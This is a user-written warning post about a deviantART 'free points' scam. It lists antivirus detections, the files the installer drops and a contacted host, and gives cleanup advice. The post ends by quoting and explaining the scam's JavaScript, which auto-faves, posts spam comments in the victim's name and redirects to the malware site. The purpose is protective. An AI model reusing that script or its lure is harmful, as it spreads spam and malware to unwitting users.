Stop the "Get 20K points" invasion
Before you do anything stupid, please read this
Obviously, this offer is swindling.
And as such it is dangerous for you !
table of contents
- What it does
- And then what ?
- What can we do ?
- "I installed it, but I'm okay"
- "OMG my brother did it !"
- I did not download/run that exe file, am I safe ?
- Connected Viruses/Malware/Adware identified
- Personal investigations
- Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
- I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.
- Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
- Identified by Fortinet as MSIL/Agent.HG!tr.spy
- Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
- Identified by many other malware detectors as Trojan.GenericKD.966175
- This is a serious threat
- This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
- Some antivirus are free. See the Mighty Source of all Truth for reference.
- Fresh news here thanks to ~krisiskiller101 investigations !
- He was able to get rid of it using MalwareBYTES
- He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
- Thanks for the info !
- seems to be a recent version of wellknown adware iBryte
- Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
- Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
- You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
- Optimum Installer (fs)
- Might be a wrong positive
- There is plenty of removal instruction tutorials (please, tell us if you have any success with one of them)
- It mess up your registry in a theatrical way
- It probably affects the download manager associated with your web browser
- It probably affects the toolbars in your web browser
- Writes 'test' everywhere in the registry
- Mess up with your ie cache
- Creates files
- Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
- Runs the created exe file, which in turn spoils your computer :
- Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
- Transfers data through internet with following addresses
- cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
- Probably displays advertising
- There is at least 2 scripts, now : mix.js and nr.js (second one only fav without leaving a comment)
- There is at least two messages spreading this sh*t
- It seems I was totally wrong thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds
- Mutations !
- The scam changed in form. Now has many titles including :
- Free 20k dA Points Is Here!
- dA Points For Free
- Learn How To Get dA Points Instantly!
- Instant Free dA Points!
- Get dA Points Without Buying!
- But content changed too
- We have a new script : deviantart.hp.af.cm/generator/…
- New Script generator/stript.js
- Looks like they leveled up
- As far as I understand it, it will make your browser all busy and unresponsive and during this time it will poop comments on as many other submissions as possible
- Theses comments are more spam messages redirecting to their malware download website
- I think that this script only use you as a means for spreading the spam and does not lead you to the malware download.
- However, the spam that will be pooped by your account on other's deviations will lead to the malware
- After careful testing (by deactivating the malicious part while keeping the core of the script), I can confirm, adding that during the browsing/commenting it displays fake information as a cover hiding what is going on.
- It is relatively efficient. During the few seconds (between 5 and 10) of my test I would have posted 5 milicious comments
- If it happened to you
- You should be able to find the scam post from where you messed up as you faved it
- From there, using the "next" button which is on top of the screen near the deviantART logo, you will be able to browse the deviations that you have scammed
- Delete/hide your offensive comments
- What does the admin ?!
- ~peppy-heppy asked them and here is the answer he received
- "We've checked over the activity associated with this profile and have found that it does qualify as a type of "spamming" so we have banned this account, along with others we've found to be doing the same. We're currently investigating new methods in dealing with this issue and hopefully bringing it to a stop. Until then, we'll continue to handle the problem as fast as we can.
Please let us know if you find this sort of thing happening again. Thank you!"
document.getElementById("gmi-ResourceViewFaveButton").click();It simulates click on the "Fave" button.
document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".
setTimeout("document.getElementsByClassName('ll f').click()", 100);It programs something that will hide this actions by reopening the comment area once it is posted.
document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit").click();It validates the comment (in you name).
window.top.location.href='deviantart.hp.af.cm/generator';It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed" see the virustotal report Now, do as you want.
alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')